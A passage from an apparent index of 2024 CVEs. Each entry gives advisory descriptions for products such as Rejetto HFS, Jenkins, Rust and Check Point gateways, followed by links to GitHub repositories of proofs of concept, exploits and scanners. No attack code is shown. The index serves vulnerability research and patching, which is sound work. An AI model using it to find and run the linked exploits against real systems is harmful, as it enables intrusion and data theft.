- [abian2/CVE-2024-23652](https://github.com/abian2/CVE-2024-23652)

### CVE-2024-23692 (2024-05-31)

Rejetto HTTP File Server, up to and including version 2.3m, is vulnerable to a template injection vulnerability. This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. As of the CVE assignment date, Rejetto HFS 2.3m is no longer supported.

- [k3lpi3b4nsh33/CVE-2024-23692](https://github.com/k3lpi3b4nsh33/CVE-2024-23692)
- [jakabakos/CVE-2024-23692-RCE-in-Rejetto-HFS](https://github.com/jakabakos/CVE-2024-23692-RCE-in-Rejetto-HFS)
- [vanboomqi/CVE-2024-23692](https://github.com/vanboomqi/CVE-2024-23692)
- [WanLiChangChengWanLiChang/CVE-2024-23692-RCE](https://github.com/WanLiChangChengWanLiChang/CVE-2024-23692-RCE)
- [Mr-r00t11/CVE-2024-23692](https://github.com/Mr-r00t11/CVE-2024-23692)
- [Tupler/CVE-2024-23692-exp](https://github.com/Tupler/CVE-2024-23692-exp)
- [BBD-YZZ/CVE-2024-23692](https://github.com/BBD-YZZ/CVE-2024-23692)
- [0x20c/CVE-2024-23692-EXP](https://github.com/0x20c/CVE-2024-23692-EXP)
- [pradeepboo/Rejetto-HFS-2.x-RCE-CVE-2024-23692](https://github.com/pradeepboo/Rejetto-HFS-2.x-RCE-CVE-2024-23692)
- [verylazytech/CVE-2024-23692](https://github.com/verylazytech/CVE-2024-23692)

### CVE-2024-23708 (2024-05-07)

In multiple functions of NotificationManagerService.java, there is a possible way to not show a toast message when a clipboard message has been accessed. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

- [uthrasri/CVE-2024-23708](https://github.com/uthrasri/CVE-2024-23708)

### CVE-2024-23709 (2024-05-07)

In multiple locations, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.

- [AbrarKhan/external_sonivox_CVE-2024-23709](https://github.com/AbrarKhan/external_sonivox_CVE-2024-23709)

### CVE-2024-23722 (2024-03-26)

In Fluent Bit 2.1.8 through 2.2.1, a NULL pointer dereference can be caused via an invalid HTTP payload with the content type of x-www-form-urlencoded. It crashes and does not restart. This could result in logs not being delivered properly.

- [alexcote1/CVE-2024-23722-poc](https://github.com/alexcote1/CVE-2024-23722-poc)

### CVE-2024-23727 (2024-03-28)

The YI Smart Kami Vision com.kamivision.yismart application through 1.0.0_20231219 for Android allows a remote attacker to execute arbitrary JavaScript code via an implicit intent to the com.ants360.yicamera.activity.WebViewActivity component.

- [actuator/yi](https://github.com/actuator/yi)

### CVE-2024-23738 (2024-01-28)

An issue in Postman version 10.22 and before on macOS allows a remote attacker to execute arbitrary code via the RunAsNode and enableNodeCliInspectArguments settings. NOTE: the vendor states "we dispute the report's accuracy ... the configuration does not enable remote code execution."

- [giovannipajeu1/CVE-2024-23738](https://github.com/giovannipajeu1/CVE-2024-23738)

### CVE-2024-23739 (2024-01-28)

An issue in Discord for macOS version 0.0.291 and before allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeCliInspectArguments settings.

- [giovannipajeu1/CVE-2024-23739](https://github.com/giovannipajeu1/CVE-2024-23739)

### CVE-2024-23740 (2024-01-28)

An issue in Kap for macOS version 3.6.0 and before allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeCliInspectArguments settings.

- [giovannipajeu1/CVE-2024-23740](https://github.com/giovannipajeu1/CVE-2024-23740)

### CVE-2024-23741 (2024-01-28)

An issue in Hyper on macOS version 3.4.1 and before allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeCliInspectArguments settings.

- [giovannipajeu1/CVE-2024-23741](https://github.com/giovannipajeu1/CVE-2024-23741)

### CVE-2024-23742 (2024-01-28)

An issue in Loom on macOS version 0.196.1 and before allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeCliInspectArguments settings. NOTE: the vendor disputes this because it requires local access to a victim's machine.

- [giovannipajeu1/CVE-2024-23742](https://github.com/giovannipajeu1/CVE-2024-23742)

### CVE-2024-23743 (2024-01-28)

Notion through 3.1.0 on macOS might allow code execution because of RunAsNode and enableNodeCliInspectArguments. NOTE: the vendor states "the attacker must launch the Notion Desktop application with nonstandard flags that turn the Electron-based application into a Node.js execution environment."

- [giovannipajeu1/CVE-2024-23743](https://github.com/giovannipajeu1/CVE-2024-23743)

### CVE-2024-23745 (2024-01-31)

In Notion Web Clipper 1.0.3(7), a .nib file is susceptible to the Dirty NIB attack. NIB files can be manipulated to execute arbitrary commands. Additionally, even if a NIB file is modified within an application, Gatekeeper may still permit the execution of the application, enabling the execution of arbitrary commands within the application's context. NOTE: the vendor's perspective is that this is simply an instance of CVE-2022-48505, cannot properly be categorized as a product-level vulnerability, and cannot have a product-level fix because it is about incorrect caching of file signatures on macOS.

- [louiselalanne/CVE-2024-23745](https://github.com/louiselalanne/CVE-2024-23745)

### CVE-2024-23746 (2024-02-02)

Miro Desktop 0.8.18 on macOS allows local Electron code injection via a complex series of steps that might be usable in some environments (bypass a kTCCServiceSystemPolicyAppBundles requirement via a file copy, an app.app/Contents rename, an asar modification, and a rename back to app.app/Contents).

- [louiselalanne/CVE-2024-23746](https://github.com/louiselalanne/CVE-2024-23746)

### CVE-2024-23747 (2024-01-29)

The Moderna Sistemas ModernaNet Hospital Management System 2024 is susceptible to an Insecure Direct Object Reference (IDOR) vulnerability. This vulnerability resides in the system's handling of user data access through a /Modernanet/LAUDO/LAU0000100/Laudo?id= URI. By manipulating this id parameter, an attacker can gain access to sensitive medical information.

- [louiselalanne/CVE-2024-23747](https://github.com/louiselalanne/CVE-2024-23747)

### CVE-2024-23772 (2024-04-30)

An issue was discovered in Quest KACE Agent for Windows 12.0.38 and 13.1.23.0. An arbitrary file create vulnerability exists in the KSchedulerSvc.exe, KUserAlert.exe, and Runkbot.exe components. This allows local attackers to create any file of their choice with NT Authority\SYSTEM privileges.

- [Verrideo/CVE-2024-23772](https://github.com/Verrideo/CVE-2024-23772)

### CVE-2024-23773 (2024-04-30)

An issue was discovered in Quest KACE Agent for Windows 12.0.38 and 13.1.23.0. An arbitrary file delete vulnerability exists in the KSchedulerSvc.exe component. Local attackers can delete any file of their choice with NT Authority\SYSTEM privileges.

- [Verrideo/CVE-2024-23773](https://github.com/Verrideo/CVE-2024-23773)

### CVE-2024-23774 (2024-04-30)

An issue was discovered in Quest KACE Agent for Windows 12.0.38 and 13.1.23.0. An unquoted Windows search path vulnerability exists in the KSchedulerSvc.exe and AMPTools.exe components. This allows local attackers to execute code of their choice with NT Authority\SYSTEM privileges.

- [Verrideo/CVE-2024-23774](https://github.com/Verrideo/CVE-2024-23774)

### CVE-2024-23780
- [HazardLab-IO/CVE-2024-23780](https://github.com/HazardLab-IO/CVE-2024-23780)

### CVE-2024-23897 (2024-01-24)

Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.

- [jenkinsci-cert/SECURITY-3314-3315](https://github.com/jenkinsci-cert/SECURITY-3314-3315)
- [binganao/CVE-2024-23897](https://github.com/binganao/CVE-2024-23897)
- [h4x0r-dz/CVE-2024-23897](https://github.com/h4x0r-dz/CVE-2024-23897)
- [xaitax/CVE-2024-23897](https://github.com/xaitax/CVE-2024-23897)
- [vmtyan/poc-cve-2024-23897](https://github.com/vmtyan/poc-cve-2024-23897)
- [yoryio/CVE-2024-23897](https://github.com/yoryio/CVE-2024-23897)
- [3yujw7njai/CVE-2024-23897](https://github.com/3yujw7njai/CVE-2024-23897)
- [10T4/PoC-Fix-jenkins-rce_CVE-2024-23897](https://github.com/10T4/PoC-Fix-jenkins-rce_CVE-2024-23897)
- [wjlin0/CVE-2024-23897](https://github.com/wjlin0/CVE-2024-23897)
- [Vozec/CVE-2024-23897](https://github.com/Vozec/CVE-2024-23897)
- [r0xdeadbeef/CVE-2024-23897](https://github.com/r0xdeadbeef/CVE-2024-23897)
- [viszsec/CVE-2024-23897](https://github.com/viszsec/CVE-2024-23897)
- [jopraveen/CVE-2024-23897](https://github.com/jopraveen/CVE-2024-23897)
- [AbraXa5/Jenkins-CVE-2024-23897](https://github.com/AbraXa5/Jenkins-CVE-2024-23897)
- [brijne/CVE-2024-23897-RCE](https://github.com/brijne/CVE-2024-23897-RCE)
- [WLXQqwer/Jenkins-CVE-2024-23897-](https://github.com/WLXQqwer/Jenkins-CVE-2024-23897-)
- [kaanatmacaa/CVE-2024-23897](https://github.com/kaanatmacaa/CVE-2024-23897)
- [Praison001/CVE-2024-23897-Jenkins-Arbitrary-Read-File-Vulnerability](https://github.com/Praison001/CVE-2024-23897-Jenkins-Arbitrary-Read-File-Vulnerability)
- [B4CK4TT4CK/CVE-2024-23897](https://github.com/B4CK4TT4CK/CVE-2024-23897)
- [godylockz/CVE-2024-23897](https://github.com/godylockz/CVE-2024-23897)
- [ifconfig-me/CVE-2024-23897](https://github.com/ifconfig-me/CVE-2024-23897)
- [ThatNotEasy/CVE-2024-23897](https://github.com/ThatNotEasy/CVE-2024-23897)
- [pulentoski/CVE-2024-23897-Arbitrary-file-read](https://github.com/pulentoski/CVE-2024-23897-Arbitrary-file-read)
- [Nebian/CVE-2024-23897](https://github.com/Nebian/CVE-2024-23897)
- [Abo5/CVE-2024-23897](https://github.com/Abo5/CVE-2024-23897)
- [JAthulya/CVE-2024-23897](https://github.com/JAthulya/CVE-2024-23897)
- [murataydemir/CVE-2024-23897](https://github.com/murataydemir/CVE-2024-23897)
- [mil4ne/CVE-2024-23897-Jenkins-4.441](https://github.com/mil4ne/CVE-2024-23897-Jenkins-4.441)
- [Maalfer/CVE-2024-23897](https://github.com/Maalfer/CVE-2024-23897)
- [Surko888/Surko-Exploit-Jenkins-CVE-2024-23897](https://github.com/Surko888/Surko-Exploit-Jenkins-CVE-2024-23897)
- [cc3305/CVE-2024-23897](https://github.com/cc3305/CVE-2024-23897)
- [NoSpaceAvailable/CVE-2024-23897](https://github.com/NoSpaceAvailable/CVE-2024-23897)
- [BinaryGoodBoy0101/Jenkins-Exploit-CVE-2024-23897-Fsociety](https://github.com/BinaryGoodBoy0101/Jenkins-Exploit-CVE-2024-23897-Fsociety)
- [ShieldAuth-PHP/PBL05-CVE-Analsys](https://github.com/ShieldAuth-PHP/PBL05-CVE-Analsys)
- [verylazytech/CVE-2024-23897](https://github.com/verylazytech/CVE-2024-23897)
- [zgimszhd61/CVE-2024-23897-poc](https://github.com/zgimszhd61/CVE-2024-23897-poc)

### CVE-2024-23995 (2024-04-29)

Cross Site Scripting (XSS) in Beekeeper Studio 4.1.13 and earlier allows remote attackers to execute arbitrary code in the column name of a database table in tabulator-popup-container.

- [EQSTLab/CVE-2024-23995](https://github.com/EQSTLab/CVE-2024-23995)

### CVE-2024-23997 (2024-07-05)

Lukas Bach yana <=1.0.16 is vulnerable to Cross Site Scripting (XSS) via src/electron-main.ts.

- [EQSTLab/CVE-2024-23997](https://github.com/EQSTLab/CVE-2024-23997)

### CVE-2024-23998 (2024-07-05)

goanother Another Redis Desktop Manager <=1.6.1 is vulnerable to Cross Site Scripting (XSS) via src/components/Setting.vue.

- [EQSTLab/CVE-2024-23998](https://github.com/EQSTLab/CVE-2024-23998)

### CVE-2024-24034 (2024-02-08)

Setor Informatica S.I.L version 3.0 is vulnerable to Open Redirect via the hprinter parameter, which allows remote attackers to execute arbitrary code.

- [ELIZEUOPAIN/CVE-2024-24034](https://github.com/ELIZEUOPAIN/CVE-2024-24034)

### CVE-2024-24035 (2024-03-07)

Cross Site Scripting (XSS) vulnerability in Setor Informatica SIL 3.1 allows attackers to run arbitrary code via the hmessage parameter.

- [ELIZEUOPAIN/CVE-2024-24035](https://github.com/ELIZEUOPAIN/CVE-2024-24035)

### CVE-2024-24134 (2024-01-29)

Sourcecodester Online Food Menu 1.0 is vulnerable to Cross Site Scripting (XSS) via the 'Menu Name' and 'Description' fields in the Update Menu section.

- [BurakSevben/CVE-2024-24134](https://github.com/BurakSevben/CVE-2024-24134)

### CVE-2024-24135 (2024-01-29)

Product Name and Product Code in the 'Add Product' section of Sourcecodester Product Inventory with Export to Excel 1.0 are vulnerable to XSS attacks.

- [BurakSevben/CVE-2024-24135](https://github.com/BurakSevben/CVE-2024-24135)

### CVE-2024-24136 (2024-01-29)

The 'Your Name' field in the Submit Score section of Sourcecodester Math Game with Leaderboard v1.0 is vulnerable to Cross-Site Scripting (XSS) attacks.

- [BurakSevben/CVE-2024-24136](https://github.com/BurakSevben/CVE-2024-24136)

### CVE-2024-24137
- [BurakSevben/CVE-2024-24137](https://github.com/BurakSevben/CVE-2024-24137)

### CVE-2024-24138
- [BurakSevben/CVE-2024-24138](https://github.com/BurakSevben/CVE-2024-24138)

### CVE-2024-24139 (2024-01-29)

Sourcecodester Login System with Email Verification 1.0 allows SQL Injection via the 'user' parameter.

- [BurakSevben/CVE-2024-24139](https://github.com/BurakSevben/CVE-2024-24139)

### CVE-2024-24140 (2024-01-29)

Sourcecodester Daily Habit Tracker App 1.0 allows SQL Injection via the 'tracker' parameter.

- [BurakSevben/CVE-2024-24140](https://github.com/BurakSevben/CVE-2024-24140)

### CVE-2024-24141 (2024-01-29)

Sourcecodester School Task Manager App 1.0 allows SQL Injection via the 'task' parameter.

- [BurakSevben/CVE-2024-24141](https://github.com/BurakSevben/CVE-2024-24141)

### CVE-2024-24142 (2024-02-13)

Sourcecodester School Task Manager 1.0 allows SQL Injection via the 'subject' parameter.

- [BurakSevben/CVE-2024-24142](https://github.com/BurakSevben/CVE-2024-24142)

### CVE-2024-24336 (2024-03-19)

Multiple Cross-site scripting (XSS) vulnerabilities in the '/members/moremember.pl' and '/members/members-home.pl' endpoints within Koha Library Management System version 23.05.05 and earlier allow malicious staff users to carry out CSRF attacks, including unauthorized changes to usernames and passwords of users visiting the affected page, via the 'Circulation note' and 'Patrons Restriction' components.

- [nitipoom-jar/CVE-2024-24336](https://github.com/nitipoom-jar/CVE-2024-24336)

### CVE-2024-24337 (2024-02-12)

CSV Injection vulnerability in '/members/moremember.pl' and '/admin/aqbudgets.pl' endpoints in Koha Library Management System version 23.05.05 and earlier allows attackers to inject DDE commands into csv exports via the 'Budget' and 'Patrons Member' components.

- [nitipoom-jar/CVE-2024-24337](https://github.com/nitipoom-jar/CVE-2024-24337)

### CVE-2024-24386 (2024-02-15)

An issue in VitalPBX v.3.2.4-5 allows an attacker to execute arbitrary code via a crafted payload to the /var/lib/vitalpbx/scripts folder.

- [erick-duarte/CVE-2024-24386](https://github.com/erick-duarte/CVE-2024-24386)

### CVE-2024-24396 (2024-02-05)

Cross Site Scripting vulnerability in Stimulsoft GmbH Stimulsoft Dashboard.JS before v.2024.1.2 allows a remote attacker to execute arbitrary code via a crafted payload to the search bar component.

- [trustcves/CVE-2024-24396](https://github.com/trustcves/CVE-2024-24396)

### CVE-2024-24397 (2024-02-05)

Cross Site Scripting vulnerability in Stimulsoft GmbH Stimulsoft Dashboard.JS before v.2024.1.2 allows a remote attacker to execute arbitrary code via a crafted payload to the ReportName field.

- [trustcves/CVE-2024-24397](https://github.com/trustcves/CVE-2024-24397)

### CVE-2024-24398 (2024-02-06)

Directory Traversal vulnerability in Stimulsoft GmbH Stimulsoft Dashboard.JS before v.2024.1.2 allows a remote attacker to execute arbitrary code via a crafted payload to the fileName parameter of the Save function.

- [trustcves/CVE-2024-24398](https://github.com/trustcves/CVE-2024-24398)

### CVE-2024-24401 (2024-02-26)

SQL Injection vulnerability in Nagios XI 2024R1.01 allows a remote attacker to execute arbitrary code via a crafted payload to the monitoringwizard.php component.

- [MAWK0235/CVE-2024-24401](https://github.com/MAWK0235/CVE-2024-24401)

### CVE-2024-24402 (2024-02-26)

An issue in Nagios XI 2024R1.01 allows a remote attacker to escalate privileges via a crafted script to the /usr/local/nagios/bin/npcd component.

- [MAWK0235/CVE-2024-24402](https://github.com/MAWK0235/CVE-2024-24402)

### CVE-2024-24409
- [passtheticket/CVE-2024-24409](https://github.com/passtheticket/CVE-2024-24409)

### CVE-2024-24488 (2024-02-07)

An issue in Shenzen Tenda Technology CP3V2.0 V11.10.00.2311090948 allows a local attacker to obtain sensitive information via the password component.

- [minj-ae/CVE-2024-24488](https://github.com/minj-ae/CVE-2024-24488)

### CVE-2024-24520 (2024-02-29)

An issue in Lepton CMS v.7.0.0 allows a local attacker to execute arbitrary code via the upgrade.php file in the languages place.

- [xF-9979/CVE-2024-24520](https://github.com/xF-9979/CVE-2024-24520)

### CVE-2024-24549 (2024-03-13)

Denial of Service due to improper input validation vulnerability for HTTP/2 requests in Apache Tomcat. When processing an HTTP/2 request, if the request exceeded any of the configured limits for headers, the associated HTTP/2 stream was not reset until after all of the headers had been processed. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M16, from 10.1.0-M1 through 10.1.18, from 9.0.0-M1 through 9.0.85, from 8.5.0 through 8.5.98.

Users are recommended to upgrade to version 11.0.0-M17, 10.1.19, 9.0.86 or 8.5.99, which fix the issue.

- [Abdurahmon3236/CVE-2024-24549](https://github.com/Abdurahmon3236/CVE-2024-24549)

### CVE-2024-24576 (2024-04-09)

Rust is a programming language. The Rust Security Response WG was notified that the Rust standard library prior to version 1.77.2 did not properly escape arguments when invoking batch files (with the `bat` and `cmd` extensions) on Windows using the `Command` API. An attacker able to control the arguments passed to the spawned process could execute arbitrary shell commands by bypassing the escaping. The severity of this vulnerability is critical for those who invoke batch files on Windows with untrusted arguments. No other platform or use is affected.

The `Command::arg` and `Command::args` APIs state in their documentation that the arguments will be passed to the spawned process as-is, regardless of the content of the arguments, and will not be evaluated by a shell. This means it should be safe to pass untrusted input as an argument.

On Windows, the implementation of this is more complex than on other platforms, because the Windows API only provides a single string containing all the arguments to the spawned process, and it is up to the spawned process to split them. Most programs use the standard C run-time argv, which in practice results in a mostly consistent way of splitting arguments.

One exception, though, is `cmd.exe` (used among other things to execute batch files), which has its own argument splitting logic. That forces the standard library to implement custom escaping for arguments passed to batch files. Unfortunately it was reported that our escaping logic was not thorough enough, and it was possible to pass malicious arguments that would result in arbitrary shell execution.

Due to the complexity of `cmd.exe`, we did not identify a solution that would correctly escape arguments in all cases. To maintain our API guarantees, we improved the robustness of the escaping code, and changed the `Command` API to return an `InvalidInput` error when it cannot safely escape an argument. This error will be emitted when spawning the process.

The fix is included in Rust 1.77.2. Note that the new escaping logic for batch files errs on the conservative side, and could reject valid arguments. Those who implement the escaping themselves or only handle trusted inputs on Windows can also use the `CommandExt::raw_arg` method to bypass the standard library's escaping logic.

- [frostb1ten/CVE-2024-24576-PoC](https://github.com/frostb1ten/CVE-2024-24576-PoC)
- [brains93/CVE-2024-24576-PoC-Python](https://github.com/brains93/CVE-2024-24576-PoC-Python)
- [aydinnyunus/CVE-2024-24576-Exploit](https://github.com/aydinnyunus/CVE-2024-24576-Exploit)
- [foxoman/CVE-2024-24576-PoC---Nim](https://github.com/foxoman/CVE-2024-24576-PoC---Nim)
- [corysabol/batbadbut-demo](https://github.com/corysabol/batbadbut-demo)
- [mishalhossin/CVE-2024-24576-PoC-Python](https://github.com/mishalhossin/CVE-2024-24576-PoC-Python)
- [lpn/CVE-2024-24576.jl](https://github.com/lpn/CVE-2024-24576.jl)
- [Gaurav1020/CVE-2024-24576-PoC-Rust](https://github.com/Gaurav1020/CVE-2024-24576-PoC-Rust)
- [SheL3G/CVE-2024-24576-PoC-BatBadBut](https://github.com/SheL3G/CVE-2024-24576-PoC-BatBadBut)

### CVE-2024-24590 (2024-02-06)

Deserialization of untrusted data can occur in versions 0.17.0 to 1.14.2 of the client SDK of Allegro AI's ClearML platform, enabling a maliciously uploaded artifact to run arbitrary code on an end user's system when interacted with.

- [OxyDeV2/ClearML-CVE-2024-24590](https://github.com/OxyDeV2/ClearML-CVE-2024-24590)
- [xffsec/CVE-2024-24590-ClearML-RCE-Exploit](https://github.com/xffsec/CVE-2024-24590-ClearML-RCE-Exploit)
- [diegogarciayala/CVE-2024-24590-ClearML-RCE-CMD-POC](https://github.com/diegogarciayala/CVE-2024-24590-ClearML-RCE-CMD-POC)
- [junnythemarksman/CVE-2024-24590](https://github.com/junnythemarksman/CVE-2024-24590)
- [sviim/ClearML-CVE-2024-24590-RCE](https://github.com/sviim/ClearML-CVE-2024-24590-RCE)
- [Bigb972003/cve-2024-24590](https://github.com/Bigb972003/cve-2024-24590)
- [j3r1ch0123/CVE-2024-24590](https://github.com/j3r1ch0123/CVE-2024-24590)

### CVE-2024-24684 (2024-05-28)

Multiple stack-based buffer overflow vulnerabilities exist in the readOFF functionality of libigl v2.5.0. A specially crafted .off file can lead to stack-based buffer overflow. An attacker can provide a malicious file to trigger this vulnerability. This vulnerability concerns the header parsing occurring while processing an `.off` file via the `readOFF` function.

We can see above that at [0] a stack-based buffer called `comment` is defined with a hardcoded size of `1000 bytes`. The call to `fscanf` at [1] is unsafe, and if the first line of the header of the `.off` file is longer than 1000 bytes it will overflow the `header` buffer.

- [SpiralBL0CK/CVE-2024-24684](https://github.com/SpiralBL0CK/CVE-2024-24684)

### CVE-2024-24685 (2024-05-28)

Multiple stack-based buffer overflow vulnerabilities exist in the readOFF functionality of libigl v2.5.0. A specially crafted .off file can lead to stack-based buffer overflow. An attacker can provide a malicious file to trigger this vulnerability. This vulnerability concerns the parsing of comments within the vertex section of an `.off` file processed via the `readOFF` function.

- [SpiralBL0CK/CVE-2024-24685](https://github.com/SpiralBL0CK/CVE-2024-24685)

### CVE-2024-24686 (2024-05-28)

Multiple stack-based buffer overflow vulnerabilities exist in the readOFF functionality of libigl v2.5.0. A specially crafted .off file can lead to stack-based buffer overflow. An attacker can provide a malicious file to trigger this vulnerability. This vulnerability concerns the parsing of comments within the faces section of an `.off` file processed via the `readOFF` function.

- [SpiralBL0CK/CVE-2024-24686](https://github.com/SpiralBL0CK/CVE-2024-24686)

### CVE-2024-24725 (2024-03-23)

Gibbon through 26.0.00 allows remote authenticated users to conduct PHP deserialization attacks via columnOrder in a POST request to the modules/System%20Admin/import_run.php&type=externalAssessment&step=4 URI.

- [MelkorW/CVE-2024-24725-PoC](https://github.com/MelkorW/CVE-2024-24725-PoC)

### CVE-2024-24760 (2024-02-02)

mailcow is a dockerized email package, with multiple containers linked in one bridged network. A security vulnerability has been identified in mailcow affecting versions < 2024-01c. This vulnerability potentially allows attackers on the same subnet to connect to exposed ports of a Docker container, even when the port is bound to 127.0.0.1. The vulnerability has been addressed by implementing additional iptables/nftables rules. These rules drop packets for Docker containers on ports 3306, 6379, 8983, and 12345, where the input interface is not `br-mailcow` and the output interface is `br-mailcow`.

- [killerbees19/CVE-2024-24760](https://github.com/killerbees19/CVE-2024-24760)

### CVE-2024-24787 (2024-05-08)

On Darwin, building a Go module which contains CGO can trigger arbitrary code execution when using the Apple version of ld, due to usage of the -lto_library flag in a "#cgo LDFLAGS" directive.

- [LOURC0D3/CVE-2024-24787-PoC](https://github.com/LOURC0D3/CVE-2024-24787-PoC)

### CVE-2024-24809 (2024-04-10)

Traccar is an open source GPS tracking system. Versions prior to 6.0 are vulnerable to path traversal and unrestricted upload of file with dangerous type. Since the system allows registration by default, attackers can acquire ordinary user permissions by registering an account and exploit this vulnerability to upload files with the prefix `device.` under any folder. Attackers can use this vulnerability for phishing, cross-site scripting attacks, and potentially execute arbitrary commands on the server. Version 6.0 contains a patch for the issue.

- [fa-rrel/CVE-2024-24809-Proof-of-concept](https://github.com/fa-rrel/CVE-2024-24809-Proof-of-concept)

### CVE-2024-24816 (2024-02-07)

CKEditor4 is an open source what-you-see-is-what-you-get HTML editor. A cross-site scripting vulnerability has been discovered in versions prior to 4.24.0-lts in samples that use the `preview` feature. All integrators that use these samples in production code can be affected. The vulnerability allows an attacker to execute JavaScript code by abusing the misconfigured preview feature. It affects all users of CKEditor 4 at version < 4.24.0-lts with the affected samples deployed in a production environment. A fix is available in version 4.24.0-lts.

- [afine-com/CVE-2024-24816](https://github.com/afine-com/CVE-2024-24816)

### CVE-2024-24919 (2024-05-28)

This issue potentially allows an attacker to read certain information on Check Point Security Gateways that are connected to the internet and have the Remote Access VPN or Mobile Access Software Blades enabled. A security fix that mitigates this vulnerability is available.

- [c3rrberu5/CVE-2024-24919](https://github.com/c3rrberu5/CVE-2024-24919)
- [emanueldosreis/CVE-2024-24919](https://github.com/emanueldosreis/CVE-2024-24919)
- [hendprw/CVE-2024-24919](https://github.com/hendprw/CVE-2024-24919)
- [LucasKatashi/CVE-2024-24919](https://github.com/LucasKatashi/CVE-2024-24919)
- [yagyuufellinluvv/CVE-2024-24919](https://github.com/yagyuufellinluvv/CVE-2024-24919)
- [Bytenull00/CVE-2024-24919](https://github.com/Bytenull00/CVE-2024-24919)
- [am-eid/CVE-2024-24919](https://github.com/am-eid/CVE-2024-24919)
- [P3wc0/CVE-2024-24919](https://github.com/P3wc0/CVE-2024-24919)
- [zam89/CVE-2024-24919](https://github.com/zam89/CVE-2024-24919)
- [satriarizka/CVE-2024-24919](https://github.com/satriarizka/CVE-2024-24919)
- [RevoltSecurities/CVE-2024-24919](https://github.com/RevoltSecurities/CVE-2024-24919)
- [Vulnpire/CVE-2024-24919](https://github.com/Vulnpire/CVE-2024-24919)
- [seed1337/CVE-2024-24919-POC](https://github.com/seed1337/CVE-2024-24919-POC)
- [0xYumeko/CVE-2024-24919](https://github.com/0xYumeko/CVE-2024-24919)
- [Praison001/CVE-2024-24919-Check-Point-Remote-Access-VPN](https://github.com/Praison001/CVE-2024-24919-Check-Point-Remote-Access-VPN)
- [smackerdodi/CVE-2024-24919-nuclei-templater](https://github.com/smackerdodi/CVE-2024-24919-nuclei-templater)
- [GoatSecurity/CVE-2024-24919](https://github.com/GoatSecurity/CVE-2024-24919)
- [GlobalsecureAcademy/CVE-2024-24919](https://github.com/GlobalsecureAcademy/CVE-2024-24919)
- [nexblade12/CVE-2024-24919](https://github.com/nexblade12/CVE-2024-24919)
- [un9nplayer/CVE-2024-24919](https://github.com/un9nplayer/CVE-2024-24919)
- [0xkalawy/CVE-2024-24919](https://github.com/0xkalawy/CVE-2024-24919)
- [Cappricio-Securities/CVE-2024-24919](https://github.com/Cappricio-Securities/CVE-2024-24919)
- [fernandobortotti/CVE-2024-24919](https://github.com/fernandobortotti/CVE-2024-24919)
- [nicolvsrlr27/CVE-2024-24919](https://github.com/nicolvsrlr27/CVE-2024-24919)
- [gurudattch/CVE-2024-24919](https://github.com/gurudattch/CVE-2024-24919)
- [YN1337/CVE-2024-24919](https://github.com/YN1337/CVE-2024-24919)
- [ifconfig-me/CVE-2024-24919-Bulk-Scanner](https://github.com/ifconfig-me/CVE-2024-24919-Bulk-Scanner)
- [r4p3c4/CVE-2024-24919-Checkpoint-Firewall-VPN-Check](https://github.com/r4p3c4/CVE-2024-24919-Checkpoint-Firewall-VPN-Check)
- [r4p3c4/CVE-2024-24919-Exploit-PoC-Checkpoint-Firewall-VPN](https://github.com/r4p3c4/CVE-2024-24919-Exploit-PoC-Checkpoint-Firewall-VPN)
- [J4F9S5D2Q7/CVE-2024-24919-CHECKPOINT](https://github.com/J4F9S5D2Q7/CVE-2024-24919-CHECKPOINT)
- [mr-kasim-mehar/CVE-2024-24919-Exploit](https://github.com/mr-kasim-mehar/CVE-2024-24919-Exploit)
- [B1naryo/CVE-2024-24919-POC](https://github.com/B1naryo/CVE-2024-24919-POC)
- [Expl0itD0g/CVE-2024-24919---Poc](https://github.com/Expl0itD0g/CVE-2024-24919---Poc)
- [bigb0x/CVE-2024-24919-Sniper](https://github.com/bigb0x/CVE-2024-24919-Sniper)
- [birdlex/cve-2024-24919-checker](https://github.com/birdlex/cve-2024-24919-checker)
- [Rug4lo/CVE-2024-24919-Exploit](https://github.com/Rug4lo/CVE-2024-24919-Exploit)
- [0nin0hanz0/CVE-2024-24919-PoC](https://github.com/0nin0hanz0/CVE-2024-24919-PoC)
- [GuayoyoCyber/CVE-2024-24919](https://github.com/GuayoyoCyber/CVE-2024-24919)
- [0xans/CVE-2024-24919](https://github.com/0xans/CVE-2024-24919)
- [Tim-Hoekstra/CVE-2024-24919](https://github.com/Tim-Hoekstra/CVE-2024-24919)
- [starlox0/CVE-2024-24919-POC](https://github.com/starlox0/CVE-2024-24919-POC)
- [nullcult/CVE-2024-24919-Exploit](https://github.com/nullcult/CVE-2024-24919-Exploit)
- [satchhacker/cve-2024-24919](https://github.com/satchhacker/cve-2024-24919)
- [verylazytech/CVE-2024-24919](https://github.com/verylazytech/CVE-2024-24919)
- [protonnegativo/CVE-2024-24919](https://github.com/protonnegativo/CVE-2024-24919)
- [SalehLardhi/CVE-2024-24919](https://github.com/SalehLardhi/CVE-2024-24919)
- [ShadowByte1/CVE-2024-24919](https://github.com/ShadowByte1/CVE-2024-24919)
- [H3KEY/CVE-2024-24919](https://github.com/H3KEY/CVE-2024-24919)
- [Jutrm/cve-2024-24919](https://github.com/Jutrm/cve-2024-24919)
- [LuisMateo1/Arbitrary-File-Read-CVE-2024-24919](https://github.com/LuisMateo1/Arbitrary-File-Read-CVE-2024-24919)
- [AhmedMansour93/Event-ID-263-Rule-Name-SOC287---Arbitrary-File-Read-on-Checkpoint-Security-Gateway-CVE-2024-24919-](https://github.com/AhmedMansour93/Event-ID-263-Rule-Name-SOC287---Arbitrary-File-Read-on-Checkpoint-Security-Gateway-CVE-2024-24919-)
- [geniuszlyy/CVE-2024-24919](https://github.com/geniuszlyy/CVE-2024-24919)
- [skyrowalker/CVE-2024-24919](https://github.com/skyrowalker/CVE-2024-24919)
- [sar-3mar/CVE-2024-24919_POC](https://github.com/sar-3mar/CVE-2024-24919_POC)

### CVE-2024-25092 (2024-06-09)

